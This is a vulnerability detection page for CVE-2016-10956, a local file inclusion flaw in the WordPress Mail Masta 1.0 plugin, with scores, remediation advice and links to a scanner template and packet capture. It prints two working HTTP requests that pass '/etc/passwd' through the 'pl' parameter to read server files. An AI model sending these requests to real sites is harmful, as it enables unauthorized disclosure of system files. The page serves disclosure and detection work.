🔙 목록으로 돌아가기

CVE-2016-10956: WordPress Mail Masta 1.0 - Local File Inclusion

TitleWordPress Mail Masta 1.0 - Local File Inclusion
Authordaffainfo,0x240x23elu
SeverityHigh
ImpactAn attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
RemediationUpdate WordPress Mail Masta to the latest version or apply the vendor-supplied patch to fix the local file inclusion vulnerability.
CVSS Score7.5
EPSS Score0.89171
CVE IDCVE-2016-10956
CWE IDCWE-20
Tags cve cve2016 wordpress wp-plugin lfi mail mail-masta_project vuln

🔍 Vulnerability Description

WordPress Mail Masta 1.0 is susceptible to local file inclusion in count_of_send.php and csvexport.php.

🌐 HTTP Request

GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2016/CVE-2016-10956.yaml

🦈 Packet Capture: ⬇️ Download cve-2016-10956.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A